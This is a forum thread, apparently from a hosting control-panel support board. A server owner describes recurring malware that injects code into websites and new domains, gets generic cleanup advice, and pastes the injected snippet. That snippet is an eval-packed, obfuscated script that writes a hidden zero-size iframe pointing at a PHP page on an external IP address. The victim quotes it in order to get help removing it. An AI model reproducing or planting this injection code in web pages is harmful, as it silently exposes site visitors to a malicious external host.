New domain + auto add virus code trouble

D

Daku

Verified User
Joined
Sep 24, 2015
Messages
5
Hello,

If I wrote i wrong category please correct and forgive me for it.

I've bought dedicated server with DA around year ago.

Approx 1 month ago something changes in DA.

At start I have random add code to many files on any website on server, <tag54.... </tag>, virus creates iframe to infected website.

I've cleaned any files infected with it on server but self adding code on domain add still works.

This is anoying an i want to prevent and delete this trash ( virus )

I've got DA + nginx + CSF + RK Hunter + clamAV, then I think my server is secured.

Where i can find script which creating domains ?

I think that main directadmin binary file is infected, but i don't recognize virus in it.

Thanks for Yours answers.
Daku
 
Hello,

1. Check homedirs for malware with maldetect.
2. Update WP, Joomla, Drupal sites to their latest releases, any and all modules and addons for them.
3. Install with custombuild suhosin+upload-checker+clamav (remove clamav if you installed from repo of your OS).

After you find and remove malware on your server, you'd better change MySQL, FTP passwords for your users/accounts.
 
I do previously steps You said, but after that my subdomains and new domans still add code below code is added before </body> tag

HTML: 
<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){
e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||
c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(
new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";
1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|
k0|1000|k01|if|setTimeout|k22|k2|http|122||src|height|118|width|board||197|php|179|tag1|ram'.split('|'),0,{}))</script>
<tag5479347352></tag5479347352>

Packed function creates iframe which destroy my websites and try to open external link.

Maldet clamav and other show nothing.
 
You must log in or register to reply here.
Back
Top